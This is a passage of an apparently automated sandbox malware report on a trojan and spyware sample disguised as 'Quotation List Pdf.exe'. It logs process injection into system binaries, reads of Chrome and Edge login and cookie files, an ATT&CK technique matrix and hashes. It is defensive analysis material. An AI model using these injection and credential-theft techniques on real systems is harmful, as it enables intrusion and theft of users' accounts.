            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058C11A4 mov eax, dword ptr fs:[00000030h]5_2_058C11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058C11A4 mov eax, dword ptr fs:[00000030h]5_2_058C11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058C11A4 mov eax, dword ptr fs:[00000030h]5_2_058C11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058C11A4 mov eax, dword ptr fs:[00000030h]5_2_058C11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582B1B0 mov eax, dword ptr fs:[00000030h]5_2_0582B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E51CB mov eax, dword ptr fs:[00000030h]5_2_058E51CB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D61C3 mov eax, dword ptr fs:[00000030h]5_2_058D61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D61C3 mov eax, dword ptr fs:[00000030h]5_2_058D61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584D1D0 mov eax, dword ptr fs:[00000030h]5_2_0584D1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584D1D0 mov ecx, dword ptr fs:[00000030h]5_2_0584D1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E61E5 mov eax, dword ptr fs:[00000030h]5_2_058E61E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058151ED mov eax, dword ptr fs:[00000030h]5_2_058151ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058401F8 mov eax, dword ptr fs:[00000030h]5_2_058401F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058BA118 mov ecx, dword ptr fs:[00000030h]5_2_058BA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058BA118 mov eax, dword ptr fs:[00000030h]5_2_058BA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058BA118 mov eax, dword ptr fs:[00000030h]5_2_058BA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058BA118 mov eax, dword ptr fs:[00000030h]5_2_058BA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D0115 mov eax, dword ptr fs:[00000030h]5_2_058D0115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05840124 mov eax, dword ptr fs:[00000030h]5_2_05840124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05811131 mov eax, dword ptr fs:[00000030h]5_2_05811131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05811131 mov eax, dword ptr fs:[00000030h]5_2_05811131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580B136 mov eax, dword ptr fs:[00000030h]5_2_0580B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580B136 mov eax, dword ptr fs:[00000030h]5_2_0580B136
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Code function: 0_2_00007FF768438130 RtlAddVectoredExceptionHandler, RaiseFailFastException
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Code function: 0_2_00007FF76849B70C SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Memory allocated: C:\Windows\System32\svchost.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Memory allocated: C:\Windows\regedit.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtCreateMutant: Direct from: 0x774635CC
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtWriteVirtualMemory: Direct from: 0x77462E3C
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtMapViewOfSection: Direct from: 0x77462D1C
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtResumeThread: Direct from: 0x774636AC
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtProtectVirtualMemory: Direct from: 0x77462F9C
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtSetInformationProcess: Direct from: 0x77462C5C
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtSetInformationThread: Direct from: 0x774563F9
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtClose: Direct from: 0x77457B2E
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtNotifyChangeKey: Direct from: 0x77463C2C
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtAllocateVirtualMemory: Direct from: 0x77462BFC
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtQueryInformationProcess: Direct from: 0x77462C26
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtResumeThread: Direct from: 0x77462FBC
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtReadFile: Direct from: 0x77462ADC
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtQuerySystemInformation: Direct from: 0x77462DFC
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtDelayExecution: Direct from: 0x77462DDC
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtAllocateVirtualMemory: Direct from: 0x77463C9C
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtClose: Direct from: 0x77462B6C
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtCreateUserProcess: Direct from: 0x7746371C
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtWriteVirtualMemory: Direct from: 0x7746490C
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtAllocateVirtualMemory: Direct from: 0x774648EC
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtQuerySystemInformation: Direct from: 0x774648CC
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtQueryVolumeInformationFile: Direct from: 0x77462F2C
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtReadVirtualMemory: Direct from: 0x77462E8C
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtCreateKey: Direct from: 0x77462C6C
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtSetInformationThread: Direct from: 0x77462B4C
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtQueryAttributesFile: Direct from: 0x77462E6C
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtDeviceIoControlFile: Direct from: 0x77462AEC
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtOpenSection: Direct from: 0x77462E0C
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtCreateFile: Direct from: 0x77462FEC
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtOpenFile: Direct from: 0x77462DCC
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtQueryInformationToken: Direct from: 0x77462CAC
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtTerminateThread: Direct from: 0x77462FCC
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtAllocateVirtualMemory: Direct from: 0x77462BEC
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; NtOpenKeyEx: Direct from: 0x77462B9C
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Memory written: C:\Windows\System32\svchost.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Memory written: C:\Windows\regedit.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Section loaded: NULL target: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Section loaded: NULL target: C:\Windows\SysWOW64\PING.EXE protection: execute and read and write
            Source: C:\Windows\SysWOW64\PING.EXE; Section loaded: NULL target: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe protection: read write
            Source: C:\Windows\SysWOW64\PING.EXE; Section loaded: NULL target: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\PING.EXE; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\PING.EXE; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\PING.EXE; Thread register set: target process: 4788
            Source: C:\Windows\SysWOW64\PING.EXE; Thread APC queued: target process: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Memory written: C:\Windows\System32\svchost.exe base: 400000
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Memory written: C:\Windows\System32\svchost.exe base: 401000
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Memory written: C:\Windows\regedit.exe base: 400000
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Memory written: C:\Windows\regedit.exe base: 401000
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 511C008
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe; Process created: C:\Windows\SysWOW64\PING.EXE "C:\Windows\SysWOW64\PING.EXE"
            Source: C:\Windows\SysWOW64\PING.EXE; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: tiwTBKVufjvhPL.exe, 00000006.00000002.3299223371.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000000.1477536448.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624702526.0000000001431000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
            Source: tiwTBKVufjvhPL.exe, 00000006.00000002.3299223371.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000000.1477536448.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624702526.0000000001431000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
            Source: tiwTBKVufjvhPL.exe, 00000006.00000002.3299223371.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000000.1477536448.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624702526.0000000001431000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: 0Program Manager
            Source: tiwTBKVufjvhPL.exe, 00000006.00000002.3299223371.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000000.1477536448.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624702526.0000000001431000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Code function: 0_2_00007FF76849BDA4 cpuid
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Code function: GetLocaleInfoEx, 0_2_00007FF768500D30
            Source: C:\Users\user\Desktop\Quotation List Pdf.exe; Code function: 0_2_00007FF76849BA10 GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter

            Stealing of Sensitive Information

            Source: Yara match; File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\PING.EXE; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\PING.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\PING.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\PING.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\PING.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\PING.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\PING.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\PING.EXE; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\PING.EXE; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match, File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Access Token Manipulation | 3 Obfuscated Files or Information | Security Account Manager | 124 System Information Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 612 Process Injection | 1 Software Packing | NTDS | 121 Security Software Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 3 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Modify Registry | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 612 Process Injection | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

            [Behavior graph] Behavior Graph ID: 1465353, Sample: Quotation List Pdf.exe, Startdate: 01/07/2024, Architecture: WINDOWS, Score: 100

            Source | Detection | Scanner | Label | Link
            Quotation List Pdf.exe | 47% | ReversingLabs | Win64.Trojan.Dacic |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.cssPING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                    Analysis ID:1465353
                                                    Start date and time:2024-07-01 15:43:23 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 9m 6s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Run name:Run with higher sleep bypass
                                                    Number of analysed new started processes analysed:14
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:2
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:Quotation List Pdf.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@12/1@12/10
                                                    EGA Information:
                                                    • Successful, ratio: 75%
                                                    HCA Information:
                                                    • Successful, ratio: 71%
                                                    • Number of executed functions: 100
                                                    • Number of non-executed functions: 326
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target tiwTBKVufjvhPL.exe, PID 6260 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • VT rate limit hit for: Quotation List Pdf.exe
Time | Type | Description
09:45:08 | API Interceptor | 7852672x Sleep call for process: PING.EXE modified
                                                    Process:C:\Windows\SysWOW64\PING.EXE
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                    Category:dropped
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.1209886597424439
                                                    Encrypted:false
                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                    MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                    SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                    SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                    SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
